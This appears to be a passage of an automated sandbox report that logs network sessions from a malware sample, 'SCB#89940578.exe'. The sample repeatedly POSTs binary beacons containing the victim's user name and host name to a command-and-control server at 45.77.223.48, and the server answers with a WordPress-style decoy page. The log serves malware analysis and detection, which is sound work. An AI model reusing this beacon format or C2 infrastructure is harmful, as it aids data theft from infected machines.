                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:56.796926022 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:56.797019005 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:56.805852890 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:56.806443930 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:56.806940079 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:56.807007074 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:56.807327986 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:56.807378054 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:56.807437897 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            35192.168.2.44977845.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:57.146159887 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:57.335321903 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:58.244652033 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:57 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:58.244704008 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:58.244756937 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:58.255439043 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:58.255542994 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:58.255597115 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:58.255789042 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:58.255913019 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:58.255985975 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:58.256062031 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            36192.168.2.44977945.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:58.597394943 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:58.784133911 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:59.726866961 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:58 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:59.726994991 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:59.727282047 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:59.741319895 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:59.741337061 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:59.741353035 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:59.741369009 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:59.741386890 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:59.741405964 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:59.741424084 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            37192.168.2.44978045.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:00.052048922 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:00.240089893 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:01.144552946 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:00 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:01.144639969 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:01.144722939 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:01.153438091 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:01.153928995 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:01.154149055 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:01.154246092 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                            Apr 26, 2024 04:43:01.154314041 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                            Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                            Apr 26, 2024 04:43:01.154378891 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                            Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                            Apr 26, 2024 04:43:01.154392004 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                            Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            38192.168.2.44978145.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:01.472636938 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:01.660120010 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:02.541904926 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:01 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:02.541935921 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:02.541949034 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:02.550173998 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:02.550573111 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:02.550749063 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:02.550867081 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:02.551116943 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
